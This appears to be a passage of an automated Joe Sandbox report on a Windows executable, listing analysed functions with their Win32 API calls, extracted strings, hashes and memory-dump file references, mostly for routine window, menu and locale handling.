                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: try_get_function$Library$Load$AddressErrorFreeLastProc
                                                                            • String ID: AreFileApisANSI$CompareStringEx$EnumSystemLocalesEx$GetDateFormatEx$GetLocaleInfoEx$GetTimeFormatEx$GetUserDefaultLocaleName$IsValidLocaleName$LCIDToLocaleName$LCMapStringEx$LocaleNameToLCID
                                                                            • API String ID: 3255926029-3252031757
                                                                            • Opcode ID: 748cdbf2a2e67f06e82e28d699bebe1a0e8633b29afd8c62ee897572dfe4acf6
                                                                            • Instruction ID: 70a9feb38160239786eb497cea9199fe0d3de6c45625fee111966a65b0b1e597
                                                                            • Opcode Fuzzy Hash: 748cdbf2a2e67f06e82e28d699bebe1a0e8633b29afd8c62ee897572dfe4acf6
                                                                            • Instruction Fuzzy Hash: 50318474620A5AA1F616DB66E849FDA2321AB4C754FC04037E709471F5DFF8CA49D382
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0000000140100314 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 285keyboardwindowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Window$ClientContextScreenState$CaptureFocusKillMessageOpenRectReleaseSendStatusTimer
                                                                            • String ID: y
                                                                            • API String ID: 3335632768-4225443349
                                                                            • Opcode ID: 2fa833ae8b83b1e89a67c08a7e610bc43548eff594350db1e462483f26c2c8c1
                                                                            • Instruction ID: 1ee254687d07ed71c5f1a3009c88b3678251525fdfe995c835682931622cd644
                                                                            • Opcode Fuzzy Hash: 2fa833ae8b83b1e89a67c08a7e610bc43548eff594350db1e462483f26c2c8c1
                                                                            • Instruction Fuzzy Hash: 7CC14AB170064186FB67DB27D9547ED23A1F78CF98F004026DB898BAF6DB79C8918741
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001400682E4 Relevance: 26.5, APIs: 7, Strings: 8, Instructions: 269windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$MetricsRectSystemWindow$ClientInvalidateRedrawUpdate
                                                                            • String ID: MFCPropertyGrid_AlphabeticMode$MFCPropertyGrid_DescriptionArea$MFCPropertyGrid_DescriptionRows$MFCPropertyGrid_HeaderCtrl$MFCPropertyGrid_ModifiedProperties$MFCPropertyGrid_VSDotNetLook$Property$Value
                                                                            • API String ID: 3900036962-2695045869
                                                                            • Opcode ID: 856cd1445b4160c5b0c293f1766f06741f0adda23ee89297d366a3f4814e01a4
                                                                            • Instruction ID: b9c017612e2454c7d987d343361791bc2b11a6e0e78e572ffac6bb379e2fc357
                                                                            • Opcode Fuzzy Hash: 856cd1445b4160c5b0c293f1766f06741f0adda23ee89297d366a3f4814e01a4
                                                                            • Instruction Fuzzy Hash: A4B1AB72700A418AEB26DF76D8847ED27A1FB88B98F144522EF1957BA6DF38C445CB40
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0000000140006880 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 167commemoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: String$_com_issue_error$AllocFree$CreateErrorInstanceLast_com_issue_errorex
                                                                            • String ID: /scanfile$ERROR:Couldn't start scan of file %s$ERROR:HR = [%d], lasterror = [%d] Couldn't access scan control interface
                                                                            • API String ID: 3113814597-1353597776
                                                                            • Opcode ID: 1abc16cf83e5d211a6a62dfe2c333499e64d123060099c3fff3bf4da9eaad34a
                                                                            • Instruction ID: ea291270b2d5649153048d633c2dedc033e68da043defdf9f8db0ebeedc637b4
                                                                            • Opcode Fuzzy Hash: 1abc16cf83e5d211a6a62dfe2c333499e64d123060099c3fff3bf4da9eaad34a
                                                                            • Instruction Fuzzy Hash: D5616A76301B418AEB16DF76E8547D823A5BB88BA8F104525EF5E67BB4DF78C845C300
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001400406DC Relevance: 24.2, APIs: 16, Instructions: 171windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Rect$Monitor$ClientCopyFromInfoLongParent$MessagePointsSend
                                                                            • String ID:
                                                                            • API String ID: 3610148278-0
                                                                            • Opcode ID: 46f239fcdd02a8dc01da9ffe3869f8642cba8842ae0c2684fc5c4c35b8ae421b
                                                                            • Instruction ID: 658eb6d66e957a12e97abe71b73fd6776e0043e8006f96cc8f19cbb98a7311a2
                                                                            • Opcode Fuzzy Hash: 46f239fcdd02a8dc01da9ffe3869f8642cba8842ae0c2684fc5c4c35b8ae421b
                                                                            • Instruction Fuzzy Hash: D4719C36710A409AEB16CF36D548BED3362FB48BC8F444121EF0A5BBA9DF78D9058740
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001400BE4E4 Relevance: 22.7, APIs: 15, Instructions: 233timeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$EqualInvalidate$Empty$ClientInflateKillMetricsSystemTimerUpdateWindow
                                                                            • String ID:
                                                                            • API String ID: 2140115980-0
                                                                            • Opcode ID: cd360899a41a6a6c3724f0f32ab7dce0ea41777aa1efc28fb13bf9afdb92219d
                                                                            • Instruction ID: b46eb257bbf13400ed2c45fe4a064d27464def9e84055fe7a230b25cf6745813
                                                                            • Opcode Fuzzy Hash: cd360899a41a6a6c3724f0f32ab7dce0ea41777aa1efc28fb13bf9afdb92219d
                                                                            • Instruction Fuzzy Hash: B2B15B76A00A819AE711CFA6E848BED33B5F788B8CF098126EF099B764DF75C505C740
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001400A4358 Relevance: 21.2, APIs: 14, Instructions: 217windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$CaptureMessageReleaseSend$EmptyInvalidateWindow$ParentRedrawUpdate
                                                                            • String ID:
                                                                            • API String ID: 1443145988-0
                                                                            • Opcode ID: 8313a05b7533fb3977c0cffb76a9e95bae3a3da96b47ab06635e08a09bbcd133
                                                                            • Instruction ID: d1434fbf5f8806557cba0e915ddbb137c19459b1431a7a1c1ab25e35ccfcad6f
                                                                            • Opcode Fuzzy Hash: 8313a05b7533fb3977c0cffb76a9e95bae3a3da96b47ab06635e08a09bbcd133
                                                                            • Instruction Fuzzy Hash: A4A1293A204A8183EB26DF27E4547DE67A4F78DB85F080122EF9A4BB61DF78D541CB00
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001400583CC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 205COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Global$LockUnlock
                                                                            • String ID: System
                                                                            • API String ID: 2502338518-3470857405
                                                                            • Opcode ID: b795d5c5f7284fc1f74c85fa28021c3fef52baed0805be5f9691c8e04aaf138a
                                                                            • Instruction ID: 1f529de35eed584343ebb938e5001ec9e82c2458c407a6b938eea15686152bc1
                                                                            • Opcode Fuzzy Hash: b795d5c5f7284fc1f74c85fa28021c3fef52baed0805be5f9691c8e04aaf138a
                                                                            • Instruction Fuzzy Hash: 6B71D27620065186EB26EF27A4047EA33A0FB4CBD4F444925EF5A677E1DF39D946CB00
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001400AA370 Relevance: 21.1, APIs: 14, Instructions: 104timewindowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: RectTimer$ClientKillWindow$MessagePointsSend$CursorInvalidateScreenUpdate
                                                                            • String ID:
                                                                            • API String ID: 2240750388-0
                                                                            • Opcode ID: 109f60e255d7a758d5ee912795749b92bdbf6b07a1fefe84cf19be051d996ad1
                                                                            • Instruction ID: d36d18874deb1fc5e0dd086220498b4da8b1af8b75a739c2893d3611c3aab569
                                                                            • Opcode Fuzzy Hash: 109f60e255d7a758d5ee912795749b92bdbf6b07a1fefe84cf19be051d996ad1
                                                                            • Instruction Fuzzy Hash: F5514676600A80C6FB159F62E4487ED3771F79DB89F044522DF0A1BAA9CFB8C589CB50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001400365F8 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 94libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLastModule$ActivateCreateDeactivateFileFindHandleLibraryLoadNameQuerySectionString
                                                                            • String ID: Comctl32.dll$p
                                                                            • API String ID: 550771814-195350848
                                                                            • Opcode ID: aded4abf4d4cafa184d0226829c475abf3b6bc58da26b9b45449068d47a8b5ea
                                                                            • Instruction ID: ece1252bebf3b8dd387ad18c32440c035ceee8c5b176b74735128af69b847d8c
                                                                            • Opcode Fuzzy Hash: aded4abf4d4cafa184d0226829c475abf3b6bc58da26b9b45449068d47a8b5ea
                                                                            • Instruction Fuzzy Hash: F0414E75218B8482EB228F66F8487DBB3E1F7487A4F844229D799476F4DFB8C449CB00
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001400B246C Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 109timeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: MetricsSystem$CaptureClientCreateEllipticExceptionScreenThrowTimerWindow
                                                                            • String ID: $
                                                                            • API String ID: 3301921535-227171996
                                                                            • Opcode ID: e6f43742b678d023fc305bd9e3999284a3d558ce682968778dea901b4331dc63
                                                                            • Instruction ID: 030775b426fb00e064c524804a9e0fd04b1fe95ded799547a3fc7bddf6d804a6
                                                                            • Opcode Fuzzy Hash: e6f43742b678d023fc305bd9e3999284a3d558ce682968778dea901b4331dc63
                                                                            • Instruction Fuzzy Hash: 4841AA76600B8087E711CF26E848B9E77A5F78CBA8F558225DF9987BA4DF79C405CB00
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001401905E4 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 105keyboardtimewindowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetWindowRect.USER32 ref: 0000000140190627
                                                                              • Part of subcall function 0000000140191994: GetParent.USER32 ref: 00000001401919B7
                                                                              • Part of subcall function 0000000140191994: GetSystemMenu.USER32(?,?,?,?,?,?,?,0000000140190650,?,?,?,?,?,?,00000001,00000001401003D6), ref: 00000001401919DD
                                                                              • Part of subcall function 0000000140191994: SetMenuDefaultItem.USER32(?,?,?,?,?,?,?,0000000140190650,?,?,?,?,?,?,00000001,00000001401003D6), ref: 0000000140191A0C
                                                                              • Part of subcall function 0000000140191994: GetParent.USER32 ref: 0000000140191A16
                                                                              • Part of subcall function 0000000140191994: IsZoomed.USER32 ref: 0000000140191A28
                                                                              • Part of subcall function 0000000140191994: EnableMenuItem.USER32 ref: 0000000140191A43
                                                                              • Part of subcall function 0000000140191994: EnableMenuItem.USER32 ref: 0000000140191A55
                                                                              • Part of subcall function 0000000140191994: EnableMenuItem.USER32 ref: 0000000140191A67
                                                                              • Part of subcall function 0000000140191994: EnableMenuItem.USER32 ref: 0000000140191AB5
                                                                              • Part of subcall function 0000000140191994: GetParent.USER32 ref: 0000000140191ABF
                                                                              • Part of subcall function 0000000140191994: DeleteMenu.USER32(?,?,?,?,?,?,?,0000000140190650,?,?,?,?,?,?,00000001,00000001401003D6), ref: 0000000140191AE7
                                                                              • Part of subcall function 0000000140191994: DeleteMenu.USER32(?,?,?,?,?,?,?,0000000140190650,?,?,?,?,?,?,00000001,00000001401003D6), ref: 0000000140191AF9
                                                                              • Part of subcall function 0000000140191994: GetParent.USER32 ref: 0000000140191B03
                                                                              • Part of subcall function 0000000140191994: DeleteMenu.USER32(?,?,?,?,?,?,?,0000000140190650,?,?,?,?,?,?,00000001,00000001401003D6), ref: 0000000140191B2B
                                                                              • Part of subcall function 0000000140191994: GetParent.USER32 ref: 0000000140191B3F
                                                                            • KillTimer.USER32(?,?,?,?,?,?,00000001,00000001401003D6), ref: 0000000140190661
                                                                            • GetKeyState.USER32 ref: 00000001401906AE
                                                                            • GetKeyState.USER32 ref: 00000001401906BD
                                                                            • GetFocus.USER32 ref: 000000014019070A
                                                                            • SetTimer.USER32 ref: 0000000140190759
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$ItemParent$Enable$Delete$StateTimer$DefaultFocusKillRectSystemWindowZoomed
                                                                            • String ID: y$y$y$y$y
                                                                            • API String ID: 3553910245-2054889058
                                                                            • Opcode ID: 984148c2d0c6c885a147767a8df0ccb66796023bdd73b0505b58824dee323965
                                                                            • Instruction ID: 5130d2e5777dad0e9c96a37fcfd2db138c7864e2263cf56751cf2513b4374faf
                                                                            • Opcode Fuzzy Hash: 984148c2d0c6c885a147767a8df0ccb66796023bdd73b0505b58824dee323965
                                                                            • Instruction Fuzzy Hash: AA41F5326046408AFE779B27E9447EA2691A7DDFA4F140121DF89476B1CFB9C8D1CB40
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 000000014010A89C Relevance: 18.3, APIs: 12, Instructions: 283timewindowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: ParentTimer$KillWindow$ClientCursorInvalidateMessageRectScreenSendUpdate
                                                                            • String ID:
                                                                            • API String ID: 2010726786-0
                                                                            • Opcode ID: d31cd8df75a69a0681ad43ad3f864289b333f351e40ff52015bd260131dfaf0b
                                                                            • Instruction ID: 830849909b2af931958280e66e6e889e8b92b99385ff9925b878fc68eb5854a0
                                                                            • Opcode Fuzzy Hash: d31cd8df75a69a0681ad43ad3f864289b333f351e40ff52015bd260131dfaf0b
                                                                            • Instruction Fuzzy Hash: 9AC14D75301A4082FE5ADB63E5547EA63A1AB8CFD0F494526DF8A4BBA1EF7CC441C740
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0000000140128548 Relevance: 17.0, APIs: 11, Instructions: 455COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
